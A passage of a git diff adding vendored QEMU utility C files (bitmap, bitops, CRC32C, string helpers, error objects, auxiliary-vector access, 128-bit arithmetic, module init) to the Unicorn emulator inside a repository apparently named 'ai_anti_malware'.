0xe5e5e5e5U, 0x7a7a7a7aU, 0x9f9f9f9fU, + 0x93939393U, 0xc9c9c9c9U, 
0x9c9c9c9cU, 0xefefefefU, + 0xa0a0a0a0U, 0xe0e0e0e0U, 0x3b3b3b3bU, 0x4d4d4d4dU, + 0xaeaeaeaeU, 0x2a2a2a2aU, 0xf5f5f5f5U, 0xb0b0b0b0U, + 0xc8c8c8c8U, 0xebebebebU, 0xbbbbbbbbU, 0x3c3c3c3cU, + 0x83838383U, 0x53535353U, 0x99999999U, 0x61616161U, + 0x17171717U, 0x2b2b2b2bU, 0x04040404U, 0x7e7e7e7eU, + 0xbabababaU, 0x77777777U, 0xd6d6d6d6U, 0x26262626U, + 0xe1e1e1e1U, 0x69696969U, 0x14141414U, 0x63636363U, + 0x55555555U, 0x21212121U, 0x0c0c0c0cU, 0x7d7d7d7dU, +}; diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitmap.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitmap.c new file mode 100644 index 0000000..f6b9cdc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitmap.c @@ -0,0 +1,55 @@ +/* + * Bitmap Module + * + * Stolen from linux/src/lib/bitmap.c + * + * Copyright (C) 2010 Corentin Chary + * + * This source code is licensed under the GNU General Public License, + * Version 2. + */ + +#include "qemu/bitops.h" +#include "qemu/bitmap.h" + +#define BITMAP_FIRST_WORD_MASK(start) (~0UL << ((start) % BITS_PER_LONG)) + +void qemu_bitmap_set(unsigned long *map, long start, long nr) +{ + unsigned long *p = map + BIT_WORD(start); + const long size = start + nr; + int bits_to_set = BITS_PER_LONG - (start % BITS_PER_LONG); + unsigned long mask_to_set = BITMAP_FIRST_WORD_MASK(start); + + while (nr - bits_to_set >= 0) { + *p |= mask_to_set; + nr -= bits_to_set; + bits_to_set = BITS_PER_LONG; + mask_to_set = ~0UL; + p++; + } + if (nr) { + mask_to_set &= BITMAP_LAST_WORD_MASK(size); + *p |= mask_to_set; + } +} + +void qemu_bitmap_clear(unsigned long *map, long start, long nr) +{ + unsigned long *p = map + BIT_WORD(start); + const long size = start + nr; + int bits_to_clear = BITS_PER_LONG - (start % BITS_PER_LONG); + unsigned long mask_to_clear = BITMAP_FIRST_WORD_MASK(start); + + while (nr - bits_to_clear >= 0) { + *p &= ~mask_to_clear; + nr -= bits_to_clear; + bits_to_clear = BITS_PER_LONG; + mask_to_clear = ~0UL; + p++; + } + if (nr) { + 
mask_to_clear &= BITMAP_LAST_WORD_MASK(size); + *p &= ~mask_to_clear; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitops.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitops.c new file mode 100644 index 0000000..f1641bf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/bitops.c @@ -0,0 +1,129 @@ +/* + * Copyright (C) 2004 Red Hat, Inc. All Rights Reserved. + * Written by David Howells (dhowells@redhat.com) + * Copyright (C) 2008 IBM Corporation + * Written by Rusty Russell + * (Inspired by David Howell's find_next_bit implementation) + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version + * 2 of the License, or (at your option) any later version. + */ + +#include "qemu/bitops.h" + +#define BITOP_WORD(nr) ((nr) / BITS_PER_LONG) + +/* + * Find the next set bit in a memory region. + */ +unsigned long find_next_bit(const unsigned long *addr, unsigned long size, + unsigned long offset) +{ + const unsigned long *p = addr + BITOP_WORD(offset); + unsigned long result = offset & ~(BITS_PER_LONG-1); + unsigned long tmp; + + if (offset >= size) { + return size; + } + size -= result; + offset %= BITS_PER_LONG; + if (offset) { + tmp = *(p++); + tmp &= (~0UL << offset); + if (size < BITS_PER_LONG) { + goto found_first; + } + if (tmp) { + goto found_middle; + } + size -= BITS_PER_LONG; + result += BITS_PER_LONG; + } + while (size >= 4*BITS_PER_LONG) { + unsigned long d1, d2, d3; + tmp = *p; + d1 = *(p+1); + d2 = *(p+2); + d3 = *(p+3); + if (tmp) { + goto found_middle; + } + if (d1 | d2 | d3) { + break; + } + p += 4; + result += 4*BITS_PER_LONG; + size -= 4*BITS_PER_LONG; + } + while (size >= BITS_PER_LONG) { + if ((tmp = *(p++))) { + goto found_middle; + } + result += BITS_PER_LONG; + size -= BITS_PER_LONG; + } + if (!size) { + return result; + } + tmp = *p; + +found_first: + tmp &= 
(~0UL >> (BITS_PER_LONG - size)); + if (tmp == 0UL) { /* Are any bits set? */ + return result + size; /* Nope. */ + } +found_middle: + return result + ctzl(tmp); +} + +/* + * This implementation of find_{first,next}_zero_bit was stolen from + * Linus' asm-alpha/bitops.h. + */ +unsigned long find_next_zero_bit(const unsigned long *addr, unsigned long size, + unsigned long offset) +{ + const unsigned long *p = addr + BITOP_WORD(offset); + unsigned long result = offset & ~(BITS_PER_LONG-1); + unsigned long tmp; + + if (offset >= size) { + return size; + } + size -= result; + offset %= BITS_PER_LONG; + if (offset) { + tmp = *(p++); + tmp |= ~0UL >> (BITS_PER_LONG - offset); + if (size < BITS_PER_LONG) { + goto found_first; + } + if (~tmp) { + goto found_middle; + } + size -= BITS_PER_LONG; + result += BITS_PER_LONG; + } + while (size & ~(BITS_PER_LONG-1)) { + if (~(tmp = *(p++))) { + goto found_middle; + } + result += BITS_PER_LONG; + size -= BITS_PER_LONG; + } + if (!size) { + return result; + } + tmp = *p; + +found_first: + tmp |= ~0UL << size; + if (tmp == ~0UL) { /* Are any bits zero? */ + return result + size; /* Nope. */ + } +found_middle: + return result + ctzl(~tmp); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/crc32c.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/crc32c.c new file mode 100644 index 0000000..8866327 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/crc32c.c @@ -0,0 +1,115 @@ +/* + * Castagnoli CRC32C Checksum Algorithm + * + * Polynomial: 0x11EDC6F41 + * + * Castagnoli93: Guy Castagnoli and Stefan Braeuer and Martin Herrman + * "Optimization of Cyclic Redundancy-Check Codes with 24 + * and 32 Parity Bits",IEEE Transactions on Communication, + * Volume 41, Number 6, June 1993 + * + * Copyright (c) 2013 Red Hat, Inc., + * + * Authors: + * Jeff Cody + * + * Based on the Linux kernel cryptographic crc32c module, + * + * Copyright (c) 2004 Cisco Systems, Inc. 
+ * Copyright (c) 2008 Herbert Xu + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the Free + * Software Foundation; either version 2 of the License, or (at your option) + * any later version. + * + */ + +#include "qemu-common.h" +#include "qemu/crc32c.h" + +/* + * This is the CRC-32C table + * Generated with: + * width = 32 bits + * poly = 0x1EDC6F41 + * reflect input bytes = true + * reflect output bytes = true + */ + +static const uint32_t crc32c_table[256] = { + 0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L, + 0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL, + 0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL, + 0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L, + 0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL, + 0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L, + 0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L, + 0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL, + 0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL, + 0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L, + 0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L, + 0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL, + 0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L, + 0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL, + 0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL, + 0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L, + 0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L, + 0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L, + 0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L, + 0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L, + 0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L, + 0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L, + 0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L, + 0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L, + 0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L, + 0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L, + 0xEB1FCBADL, 
0x197448AEL, 0x0A24BB5AL, 0xF84F3859L, + 0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L, + 0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L, + 0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L, + 0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L, + 0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L, + 0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL, + 0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L, + 0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L, + 0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL, + 0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L, + 0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL, + 0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL, + 0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L, + 0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L, + 0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL, + 0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL, + 0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L, + 0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL, + 0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L, + 0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L, + 0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL, + 0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L, + 0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL, + 0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL, + 0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L, + 0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL, + 0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L, + 0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L, + 0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL, + 0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL, + 0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L, + 0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L, + 0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL, + 0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L, + 0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL, + 0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL, + 0xBE2DA0A5L, 
0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L +}; + + +uint32_t crc32c(uint32_t crc, const uint8_t *data, unsigned int length) +{ + while (length--) { + crc = crc32c_table[(crc ^ *data++) & 0xFFL] ^ (crc >> 8); + } + return crc^0xffffffff; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/cutils.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/cutils.c new file mode 100644 index 0000000..9a6cbdb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/cutils.c @@ -0,0 +1,157 @@ +/* + * Simple C functions to supplement the C library + * + * Copyright (c) 2006 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#include "qemu-common.h" +#include "qemu/host-utils.h" +#include +#include +#include + + +void pstrcpy(char *buf, int buf_size, const char *str) +{ + int c; + char *q = buf; + + if (buf_size <= 0) + return; + + for(;;) { + c = *str++; + if (c == 0 || q >= buf + buf_size - 1) + break; + *q++ = c; + } + *q = '\0'; +} + +/* strcat and truncate. */ +char *pstrcat(char *buf, int buf_size, const char *s) +{ + int len; + len = strlen(buf); + if (len < buf_size) + pstrcpy(buf + len, buf_size - len, s); + return buf; +} + +int strstart(const char *str, const char *val, const char **ptr) +{ + const char *p, *q; + p = str; + q = val; + while (*q != '\0') { + if (*p != *q) + return 0; + p++; + q++; + } + if (ptr) + *ptr = p; + return 1; +} + +int qemu_fls(int i) +{ + return 32 - clz32(i); +} + +static int64_t suffix_mul(char suffix, int64_t unit) +{ + switch (qemu_toupper(suffix)) { + case STRTOSZ_DEFSUFFIX_B: + return 1; + case STRTOSZ_DEFSUFFIX_KB: + return unit; + case STRTOSZ_DEFSUFFIX_MB: + return unit * unit; + case STRTOSZ_DEFSUFFIX_GB: + return unit * unit * unit; + case STRTOSZ_DEFSUFFIX_TB: + return unit * unit * unit * unit; + case STRTOSZ_DEFSUFFIX_PB: + return unit * unit * unit * unit * unit; + case STRTOSZ_DEFSUFFIX_EB: + return unit * unit * unit * unit * unit * unit; + } + return -1; +} + +/* + * Convert string to bytes, allowing either B/b for bytes, K/k for KB, + * M/m for MB, G/g for GB or T/t for TB. End pointer will be returned + * in *end, if not NULL. Return -ERANGE on overflow, Return -EINVAL on + * other error. 
+ */ +int64_t strtosz_suffix_unit(const char *nptr, char **end, + const char default_suffix, int64_t unit) +{ + int64_t retval = -EINVAL; + char *endptr; + unsigned char c; + int mul_required = 0; + double val, mul, integral, fraction; + + errno = 0; + val = strtod(nptr, &endptr); + if (isnan(val) || endptr == nptr || errno != 0) { + goto fail; + } + fraction = modf(val, &integral); + if (fraction != 0) { + mul_required = 1; + } + c = *endptr; + mul = (double)suffix_mul(c, unit); + if (mul >= 0) { + endptr++; + } else { + mul = (double)suffix_mul(default_suffix, unit); + assert(mul >= 0); + } + if (mul == 1 && mul_required) { + goto fail; + } + if ((val * mul >= (double)INT64_MAX) || val < 0) { + retval = -ERANGE; + goto fail; + } + retval = (int64_t)(val * mul); + +fail: + if (end) { + *end = endptr; + } + + return retval; +} + +int64_t strtosz_suffix(const char *nptr, char **end, const char default_suffix) +{ + return strtosz_suffix_unit(nptr, end, default_suffix, 1024); +} + +int64_t strtosz(const char *nptr, char **end) +{ + return strtosz_suffix(nptr, end, STRTOSZ_DEFSUFFIX_MB); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/error.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/error.c new file mode 100644 index 0000000..7dc0bcc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/error.c @@ -0,0 +1,129 @@ +/* + * QEMU Error Objects + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2. See + * the COPYING.LIB file in the top-level directory. + */ + +#include "qemu-common.h" +#include "qapi/error.h" + +struct Error +{ + char *msg; + ErrorClass err_class; +}; + +Error *error_abort; + +void error_set(Error **errp, ErrorClass err_class, const char *fmt, ...) 
+{ + Error *err; + va_list ap; + int saved_errno = errno; + + if (errp == NULL) { + return; + } + assert(*errp == NULL); + + err = g_malloc0(sizeof(*err)); + + va_start(ap, fmt); + err->msg = g_strdup_vprintf(fmt, ap); + va_end(ap); + err->err_class = err_class; + + if (errp == &error_abort) { + // abort(); + } + + *errp = err; + + errno = saved_errno; +} + +void error_set_errno(Error **errp, int os_errno, ErrorClass err_class, + const char *fmt, ...) +{ + Error *err; + char *msg1; + va_list ap; + int saved_errno = errno; + + if (errp == NULL) { + return; + } + assert(*errp == NULL); + + err = g_malloc0(sizeof(*err)); + + va_start(ap, fmt); + msg1 = g_strdup_vprintf(fmt, ap); + if (os_errno != 0) { + err->msg = g_strdup_printf("%s: %s", msg1, strerror(os_errno)); + g_free(msg1); + } else { + err->msg = msg1; + } + va_end(ap); + err->err_class = err_class; + + if (errp == &error_abort) { + // abort(); + } + + *errp = err; + + errno = saved_errno; +} + +void error_setg_file_open(Error **errp, int os_errno, const char *filename) +{ + error_setg_errno(errp, os_errno, "Could not open '%s'", filename); +} + +Error *error_copy(const Error *err) +{ + Error *err_new; + + err_new = g_malloc0(sizeof(*err)); + err_new->msg = g_strdup(err->msg); + err_new->err_class = err->err_class; + + return err_new; +} + +ErrorClass error_get_class(const Error *err) +{ + return err->err_class; +} + +const char *error_get_pretty(Error *err) +{ + return err->msg; +} + +void error_free(Error *err) +{ + if (err) { + g_free(err->msg); + g_free(err); + } +} + +void error_propagate(Error **dst_errp, Error *local_err) +{ + if (local_err && dst_errp == &error_abort) { + // abort(); + } else if (dst_errp && !*dst_errp) { + *dst_errp = local_err; + } else if (local_err) { + error_free(local_err); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/getauxval.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/getauxval.c new file mode 100644 index 0000000..208bfa3 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/qemu/util/getauxval.c @@ -0,0 +1,109 @@ +/* + * QEMU access to the auxiliary vector + * + * Copyright (C) 2013 Red Hat, Inc + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "qemu-common.h" +#include "qemu/osdep.h" + +#ifdef CONFIG_GETAUXVAL +/* Don't inline this in qemu/osdep.h, because pulling in for + the system declaration of getauxval pulls in the system , which + conflicts with qemu's version. */ + +#include + +unsigned long qemu_getauxval(unsigned long key) +{ + return getauxval(key); +} +#elif defined(__linux__) +#include "elf.h" + +/* Our elf.h doesn't contain Elf32_auxv_t and Elf64_auxv_t, which is ok because + that just makes it easier to define it properly for the host here. 
*/ +typedef struct { + unsigned long a_type; + unsigned long a_val; +} ElfW_auxv_t; + +static const ElfW_auxv_t *auxv; + +static const ElfW_auxv_t *qemu_init_auxval(void) +{ + ElfW_auxv_t *a; + ssize_t size = 512, r, ofs; + int fd; + + /* Allocate some initial storage. Make sure the first entry is set + to end-of-list, so that we've got a valid list in case of error. */ + auxv = a = g_malloc(size); + a[0].a_type = 0; + a[0].a_val = 0; + + fd = open("/proc/self/auxv", O_RDONLY); + if (fd < 0) { + return a; + } + + /* Read the first SIZE bytes. Hopefully, this covers everything. */ + r = read(fd, a, size); + + if (r == size) { + /* Continue to expand until we do get a partial read. */ + do { + ofs = size; + size *= 2; + auxv = a = g_realloc(a, size); + r = read(fd, (char *)a + ofs, ofs); + } while (r == ofs); +} + + close(fd); + return a; +} + +unsigned long qemu_getauxval(unsigned long type) +{ + const ElfW_auxv_t *a = auxv; + + if (unlikely(a == NULL)) { + a = qemu_init_auxval(); + } + + for (; a->a_type != 0; a++) { + if (a->a_type == type) { + return a->a_val; + } + } + + return 0; +} + +#else + +unsigned long qemu_getauxval(unsigned long type) +{ + return 0; +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/host-utils.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/host-utils.c new file mode 100644 index 0000000..5f1d7a7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/host-utils.c @@ -0,0 +1,167 @@ +/* + * Utility compute operations used by translated code. 
+ * + * Copyright (c) 2003 Fabrice Bellard + * Copyright (c) 2007 Aurelien Jarno + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ + +#include +#include "unicorn/platform.h" +#include "qemu/host-utils.h" + +#ifndef CONFIG_INT128 +/* Long integer helpers */ +static inline void mul64(uint64_t *plow, uint64_t *phigh, + uint64_t a, uint64_t b) +{ + typedef union { + uint64_t ll; + struct { +#ifdef HOST_WORDS_BIGENDIAN + uint32_t high, low; +#else + uint32_t low, high; +#endif + } l; + } LL; + LL rl, rm, rn, rh, a0, b0; + uint64_t c; + + a0.ll = a; + b0.ll = b; + + rl.ll = (uint64_t)a0.l.low * b0.l.low; + rm.ll = (uint64_t)a0.l.low * b0.l.high; + rn.ll = (uint64_t)a0.l.high * b0.l.low; + rh.ll = (uint64_t)a0.l.high * b0.l.high; + + c = (uint64_t)rl.l.high + rm.l.low + rn.l.low; + rl.l.high = (uint32_t)c; + c >>= 32; + c = c + rm.l.high + rn.l.high + rh.l.low; + rh.l.low = (uint32_t)c; + rh.l.high += (uint32_t)(c >> 32); + + *plow = rl.ll; + *phigh = rh.ll; +} + +/* Unsigned 64x64 -> 128 multiplication */ +void mulu64 (uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) +{ + mul64(plow, phigh, a, b); +} + +/* Signed 64x64 -> 128 multiplication */ +void muls64 (uint64_t *plow, uint64_t *phigh, int64_t a, int64_t b) +{ + uint64_t rh; + + mul64(plow, &rh, a, b); + + /* Adjust for signs. */ + if (b < 0) { + rh -= a; + } + if (a < 0) { + rh -= b; + } + *phigh = rh; +} + +/* Unsigned 128x64 division. Returns 1 if overflow (divide by zero or */ +/* quotient exceeds 64 bits). Otherwise returns quotient via plow and */ +/* remainder via phigh. 
*/ +int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor) +{ + uint64_t dhi = *phigh; + uint64_t dlo = *plow; + unsigned i; + uint64_t carry = 0; + + if (divisor == 0) { + return 1; + } else if (dhi == 0) { + *plow = dlo / divisor; + *phigh = dlo % divisor; + return 0; + } else if (dhi > divisor) { + return 1; + } else { + + for (i = 0; i < 64; i++) { + carry = dhi >> 63; + dhi = (dhi << 1) | (dlo >> 63); + if (carry || (dhi >= divisor)) { + dhi -= divisor; + carry = 1; + } else { + carry = 0; + } + dlo = (dlo << 1) | carry; + } + + *plow = dlo; + *phigh = dhi; + return 0; + } +} + +int divs128(int64_t *plow, int64_t *phigh, int64_t divisor) +{ + int sgn_dvdnd = *phigh < 0; + int sgn_divsr = divisor < 0; + int overflow = 0; + + if (sgn_dvdnd) { + *plow = ~(*plow); + *phigh = ~(*phigh); + if (*plow == (int64_t)-1) { + *plow = 0; + (*phigh)++; + } else { + (*plow)++; + } + } + + if (sgn_divsr) { + divisor = 0 - divisor; + } + + overflow = divu128((uint64_t *)plow, (uint64_t *)phigh, (uint64_t)divisor); + + if (sgn_dvdnd ^ sgn_divsr) { + *plow = 0 - *plow; + } + + if (!overflow) { + if ((*plow < 0) ^ (sgn_dvdnd ^ sgn_divsr)) { + overflow = 1; + } + } + + return overflow; +} +#else +// avoid empty object file +void dummy_func(void); +void dummy_func(void) {} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/module.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/module.c new file mode 100644 index 0000000..9d9cd23 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/module.c @@ -0,0 +1,57 @@ +/* + * QEMU Module Infrastructure + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + * Contributions after 2012-01-13 are licensed under the terms of the + * GNU GPL, version 2 or (at your option) any later version. 
+ */ + +#include "qemu-common.h" +#include "qemu/queue.h" + +#include "uc_priv.h" + +static void init_lists(struct uc_struct *uc) +{ + int i; + + for (i = 0; i < MODULE_INIT_MAX; i++) { + QTAILQ_INIT(&uc->init_type_list[i]); + } +} + + +static ModuleTypeList *find_type(struct uc_struct *uc, module_init_type type) +{ + ModuleTypeList *l; + + init_lists(uc); + + l = &uc->init_type_list[type]; + + return l; +} + +static void module_load(module_init_type type) +{ +} + +void module_call_init(struct uc_struct *uc, module_init_type type) +{ + ModuleTypeList *l; + ModuleEntry *e; + + module_load(type); + l = find_type(uc, type); + + QTAILQ_FOREACH(e, l, node) { + e->init(); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-posix.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-posix.c new file mode 100644 index 0000000..3614205 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/oslib-posix.c @@ -0,0 +1,141 @@ +/* + * os-posix-lib.c + * + * Copyright (c) 2003-2008 Fabrice Bellard + * Copyright (c) 2010 Red Hat, Inc. + * + * QEMU library functions on POSIX which are shared between QEMU and + * the QEMU tools. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
